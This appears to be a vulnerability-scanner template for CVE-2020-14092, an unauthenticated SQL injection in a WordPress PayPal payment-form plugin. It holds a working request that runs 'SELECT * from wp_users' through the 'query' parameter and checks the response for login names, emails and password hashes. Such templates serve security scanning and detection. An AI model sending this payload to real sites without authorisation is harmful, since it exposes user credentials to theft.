id: CVE-2020-14092 info: name: WordPress Payment Form For Paypal Pro Unauthenticated SQL Injection author: princechaddha severity: critical description: WordPress Payment Form For Paypal Pro 'query' parameter allows for any unauthenticated user to perform SQL queries with result output to a web page in JSON format. reference: https://wpscan.com/vulnerability/10287 tags: cve,cve2020,wordpress,wp-plugin,sqli classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.80 cve-id: CVE-2020-14092 cwe-id: CWE-89 requests: - method: GET path: - "{{BaseURL}}/?cffaction=get_data_from_database&query=SELECT%20*%20from%20wp_users" matchers-condition: and matchers: - type: word words: - "text/html" part: header - type: word words: - '"user_login"' - '"user_email"' - '"user_pass"' - '"user_activation_key"' condition: and part: body - type: status status: - 200